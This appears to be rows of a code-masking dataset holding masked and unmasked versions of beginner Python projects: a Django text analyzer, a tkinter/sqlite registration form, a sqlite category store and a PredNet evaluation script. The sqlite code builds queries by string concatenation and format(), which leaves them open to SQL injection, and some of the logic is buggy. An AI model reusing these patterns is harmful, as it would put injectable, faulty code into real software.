dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
if not (djtext[index] == '' and djtext[index + 1] == ''):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| <mask token>
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse(
"<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>"
)
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
if not (djtext[index] == '' and djtext[index + 1] == ''):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse(
"<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>"
)
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
if not (djtext[index] == '' and djtext[index + 1] == ''):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| # I Have Created this file -Nabeel
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request,'index.html')
def aboutme(request):
return HttpResponse (" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse ("<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>")
def analyze(request):
#get the text
djtext = request.POST.get('text', 'default')
#check checkbox value
removepunc = request.POST.get('removepunc', 'off') #on & off
fullcaps = request.POST.get('fullcaps','off')
newlineremover = request.POST.get('newlineremover','off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
#check which checkbox is on
if removepunc == "on":
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed=""
for char in djtext:
if char not in punctuations:
analyzed=analyzed + char
dics = {'purpose':'Removed Punctuations' , 'analyzed_text':analyzed}
djtext=analyzed
#return render(request,'analyze.html',dics)
if (fullcaps == "on"):
analyzed = ""
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
# Analyze the text
djtext = analyzed
# return render(request, 'analyze.html', dics)
if (newlineremover == "on"):
analyzed = ""
for char in djtext:
if char != "\n" and char != "\r":
analyzed = analyzed + char
else:
print("no")
print("pre", analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext=analyzed
# Analyze the text
#return render(request, 'analyze.html', dics)
if (extraspaceremover == "on"):
analyzed = ""
for index, char in enumerate(djtext):
if not (djtext[index] == "" and djtext[index+1] == ""):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text': analyzed}
djtext = analyzed
#return render(request, 'analyze.html', dics)
if (charcount == "on"):
analyzed = ""
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are', 'analyzed_text': analyzed}
if (removepunc != "on" and fullcaps != "on" and newlineremover != "on" and extraspaceremover != "on" and charcount!= "on"):
return HttpResponse("Please Select Any Function And Try Again!")
return render(request, 'analyze.html', dics)
| [
2,
3,
4,
5,
6
] |
1,613 | 37cafe5d3d3342e5e4070b87caf0cfb5bcfdfd8d | <mask token>
def sign_in():
root.destroy()
import main
<mask token>
| <mask token>
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
messagebox.showerror('Register-Form', 'ID Is compolsary for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
messagebox.showwarning('Delete Status', 'Deleted Succesfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
messagebox.showerror('Submit Status', 'All fields are requierd')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS Student (ID INTEGER, Email TEXT, Password1 TEXT, Password2 TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
<mask token>
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
<mask token>
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
<mask token>
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
<mask token>
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
<mask token>
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
<mask token>
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
<mask token>
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
<mask token>
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
<mask token>
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
<mask token>
b1.place(relx=0.767, rely=0.578, height=84, width=87)
<mask token>
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| <mask token>
root = Tk()
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
messagebox.showerror('Register-Form', 'ID Is compolsary for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
messagebox.showwarning('Delete Status', 'Deleted Succesfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
messagebox.showerror('Submit Status', 'All fields are requierd')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS Student (ID INTEGER, Email TEXT, Password1 TEXT, Password2 TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| from tkinter.ttk import *
from tkinter import *
import tkinter.ttk as ttk
from tkinter import messagebox
import sqlite3
root = Tk()
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
messagebox.showerror('Register-Form', 'ID Is compolsary for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
messagebox.showwarning('Delete Status', 'Deleted Succesfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
messagebox.showerror('Submit Status', 'All fields are requierd')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
'CREATE TABLE IF NOT EXISTS Student (ID INTEGER, Email TEXT, Password1 TEXT, Password2 TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| from tkinter.ttk import *
from tkinter import *
import tkinter.ttk as ttk
from tkinter import messagebox
import sqlite3
root = Tk()
root.title('Register-Form')
root.geometry("600x450+-2+86")
root.minsize(120, 1)
def delete():
if(Entry1.get()==''):
messagebox.showerror('Register-Form', 'ID Is compolsary for delete')
else:
ms = messagebox.askokcancel('Delete Result', 'Would you like to delete this account?')
if (ms):
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='"+ Entry1.get() +"'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
messagebox.showwarning('Delete Status', 'Deleted Succesfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp=Entry1.get()
un=Entry2.get()
password=Entry3.get()
if (idp=='' and password=='' and un==''):
messagebox.showerror('Submit Status', 'All fields are requierd')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1=Entry1.get();
uname=Entry2.get();
password1=Entry3.get();
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("CREATE TABLE IF NOT EXISTS Student (ID INTEGER, Email TEXT, Password1 TEXT, Password2 TEXT)")
c.execute("INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)", (id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form', 'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form', f'Please use another id instead of {Entry1.get()} because that id exists')
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='''Enter ID:''')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='''UName:''')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='''Password:''')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='''Confirm Password:''')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='''Delete''')
root.mainloop()
| [
1,
4,
5,
6,
7
] |
1,614 | 9b3c2604b428295eda16030b45cf739e714f3d00 | <mask token>
class State(Enum):
ok = True
error = False
<mask token>
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
<mask token>
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
<mask token>
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
query = (
'INSERT OR REPLACE INTO {0} (word, weight) VALUES({1},{2})'
.format(category, key, value))
cursor.execute(query)
connection.commit()
except Exception:
state = State.error
print('Error with setting data to database in {0} category'.format(
category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
import sqlite3
from enum import Enum
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
query = (
'INSERT OR REPLACE INTO {0} (word, weight) VALUES({1},{2})'
.format(category, key, value))
cursor.execute(query)
connection.commit()
except Exception:
state = State.error
print('Error with setting data to database in {0} category'.format(
category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| '''
Module for interaction with database
'''
import sqlite3
from enum import Enum
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print("Error connection db {0}".format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print("Error closing connection")
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = "CREATE TABLE {0} (word varchar(15) primary key, weight real)".format(category)
cursor.execute(query)
except Exception:
state = State.error
print("Error with creating new category")
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = "SELECT * from {0} ORDER BY weight DESC".format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print("Error with getting data from {0} category".format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
query = 'INSERT OR REPLACE INTO {0} (word, weight) VALUES({1},{2})'.format(category, key, value)
cursor.execute(query)
connection.commit()
except Exception:
state = State.error
print("Error with setting data to database in {0} category".format(category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print("Error with getting category file names")
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result"
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print("Error with getting category file names")
finally:
close_db_connection()
return state.value, names | [
7,
8,
10,
11,
12
] |
1,615 | a3507019ca3310d7ad7eb2a0168dcdfe558643f6 | <mask token>
| <mask token>
matplotlib.use('Agg')
<mask token>
f.close()
<mask token>
train_model.load_weights(weights_file)
<mask token>
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
<mask token>
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
<mask token>
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
<mask token>
plt.figure(figsize=(nt, 2 * aspect_ratio))
<mask token>
gs.update(wspace=0.0, hspace=0.0)
<mask token>
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
<mask token>
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
| <mask token>
matplotlib.use('Agg')
<mask token>
n_plot = 40
batch_size = 10
nt = 5
weights_file = os.path.join(WEIGHTS_DIR,
'prednet_facebook_segmpred_weights.hdf5')
json_file = os.path.join(WEIGHTS_DIR, 'prednet_facebook_segmpred_model.json')
test_file = os.path.join(DATA_DIR, 'facebook_segmpred_X_test.hkl')
test_sources = os.path.join(DATA_DIR, 'facebook_segmpred_sources_test.hkl')
f = open(json_file, 'r')
json_string = f.read()
f.close()
train_model = model_from_json(json_string, custom_objects={'PredNet': PredNet})
train_model.load_weights(weights_file)
layer_config = train_model.layers[1].get_config()
layer_config['output_mode'] = 'prediction'
data_format = layer_config['data_format'
] if 'data_format' in layer_config else layer_config['dim_ordering']
test_prednet = PredNet(weights=train_model.layers[1].get_weights(), **
layer_config)
test_generator = SequenceGenerator(test_file, test_sources, nt,
sequence_start_mode='unique', data_format=data_format)
X_test = test_generator.create_all()
input_shape = X_test.shape[1:]
inputs = Input(shape=tuple(input_shape))
predictions = test_prednet(inputs)
test_model = Model(inputs=inputs, outputs=predictions)
X_hat = test_model.predict(X_test, batch_size)
if data_format == 'channels_first':
X_test = np.transpose(X_test, (0, 1, 3, 4, 2))
X_hat = np.transpose(X_hat, (0, 1, 3, 4, 2))
print('X_hat.shape:', X_hat.shape)
print('X_test.shape:', X_test.shape)
mse_model = np.mean((X_test[:, 1:] - X_hat[:, 1:]) ** 2)
mse_prev = np.mean((X_test[:, :-1] - X_test[:, 1:]) ** 2)
if not os.path.exists(RESULTS_SAVE_DIR):
os.mkdir(RESULTS_SAVE_DIR)
f = open(RESULTS_SAVE_DIR + 'prediction_scores.txt', 'w')
f.write('Model MSE: %f\n' % mse_model)
f.write('Previous Frame MSE: %f' % mse_prev)
f.close()
aspect_ratio = float(X_hat.shape[2]) / X_hat.shape[3]
plt.figure(figsize=(nt, 2 * aspect_ratio))
gs = gridspec.GridSpec(2, nt)
gs.update(wspace=0.0, hspace=0.0)
plot_save_dir = os.path.join(RESULTS_SAVE_DIR, 'prediction_plots/')
if not os.path.exists(plot_save_dir):
os.mkdir(plot_save_dir)
plot_idx = np.random.permutation(X_test.shape[0])[:n_plot]
for i in plot_idx:
for t in range(nt):
plt.subplot(gs[t])
plt.imshow(X_test[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Actual', fontsize=10)
plt.subplot(gs[t + nt])
plt.imshow(X_hat[i, t], interpolation='none')
plt.tick_params(axis='both', which='both', bottom='off', top='off',
left='off', right='off', labelbottom='off', labelleft='off')
if t == 0:
plt.ylabel('Predicted', fontsize=10)
plt.savefig(plot_save_dir + 'plot_' + str(i) + '.png')
plt.clf()
